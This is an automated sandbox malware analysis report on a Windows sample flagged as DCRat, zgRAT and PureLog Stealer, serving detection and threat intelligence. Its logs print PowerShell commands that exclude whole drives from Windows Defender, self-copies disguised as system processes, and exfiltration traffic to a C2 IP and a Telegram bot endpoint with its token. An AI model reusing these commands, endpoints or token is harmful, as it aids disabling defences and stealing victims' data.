Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe

Overview

General Information

Sample name:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Analysis ID:1531798
MD5:670861d1059f9baf2a8525097157d1c2
SHA1:f7007917499121cd5107697593a9429911ae0e77
SHA256:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647caa476557eedb53f97c4
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe (PID: 4708 cmdline: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe" MD5: 670861D1059F9BAF2A8525097157D1C2)
    • powershell.exe (PID: 3524 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4424 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4052 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6592 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4464 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1784 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7128 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6148 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7172 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7244 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8864 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 9068 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 8288 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe (PID: 8536 cmdline: "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe" MD5: 670861D1059F9BAF2A8525097157D1C2)
  • JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe (PID: 8412 cmdline: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe" MD5: 670861D1059F9BAF2A8525097157D1C2)
    • powershell.exe (PID: 8888 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1656 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8760 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3836 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8772 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7608 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8484 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5996 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6656 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8680 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • smartscreen.exe (PID: 8488 cmdline: C:\Users\user\Downloads\smartscreen.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • smartscreen.exe (PID: 8496 cmdline: C:\Users\user\Downloads\smartscreen.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • WmiPrvSE.exe (PID: 8512 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • WmiPrvSE.exe (PID: 8556 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 670861D1059F9BAF2A8525097157D1C2)
  • svchost.exe (PID: 10000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\user\Downloads\smartscreen.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\user\Downloads\smartscreen.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\user\Downloads\smartscreen.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Execution from Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", CommandLine: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, NewProcessName: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, OriginalFileName: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", ProcessId: 8412, ProcessName: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessId: 4708, TargetFilename: C:\Recovery\WmiPrvSE.exe
                            Sigma detected: Parent in Public Folder Suspicious Process
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe", ParentImage: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, ParentProcessId: 8412, ParentProcessName: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8888, ProcessName: powershell.exe
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe", ParentImage: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ParentProcessId: 4708, ParentProcessName: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3524, ProcessName: powershell.exe
                            Sigma detected: Suspicious Program Location with Network Connections
                            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 5.42.66.51, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Initiated: true, ProcessId: 8412, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49798
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\Downloads\smartscreen.exe, CommandLine: C:\Users\user\Downloads\smartscreen.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Downloads\smartscreen.exe, NewProcessName: C:\Users\user\Downloads\smartscreen.exe, OriginalFileName: C:\Users\user\Downloads\smartscreen.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\Downloads\smartscreen.exe, ProcessId: 8488, ProcessName: smartscreen.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe", ParentImage: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ParentProcessId: 4708, ParentProcessName: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3524, ProcessName: powershell.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe", ParentImage: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ParentProcessId: 4708, ParentProcessName: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3524, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 10000, ProcessName: svchost.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-11T20:37:35.009718+020020480951A Network Trojan was detected192.168.2.5497985.42.66.5180TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-11T20:37:49.364405+020020481301A Network Trojan was detected192.168.2.5498965.42.66.5180TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-11T20:37:12.962571+020028033053Unknown Traffic192.168.2.54970534.117.59.81443TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Recovery\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeReversingLabs: Detection: 87%
                            Source: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeReversingLabs: Detection: 87%
                            Source: C:\Recovery\WmiPrvSE.exeReversingLabs: Detection: 87%
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\Desktop\ArFrORkS.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\EhviVOkL.logReversingLabs: Detection: 45%
                            Source: C:\Users\user\Desktop\KIRpkYvx.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\QyIevzpi.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\VWRNVcdg.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\fTGLCVSM.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\hILtgrfA.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\sBnSdgqk.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\uDZAyPvf.logReversingLabs: Detection: 45%
                            Source: C:\Users\user\Desktop\wjuqGuQY.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Downloads\smartscreen.exeReversingLabs: Detection: 87%
                            Multi AV Scanner detection for submitted file
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeReversingLabs: Detection: 87%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJoe Sandbox ML: detected
                            Source: C:\Recovery\WmiPrvSE.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeJoe Sandbox ML: detected
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FF848FAD35D

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49798 -> 5.42.66.51:80
                            Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49896 -> 5.42.66.51:80
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"Host: api.telegram.orgContent-Length: 86200Expect: 100-continueConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                            Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                            Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
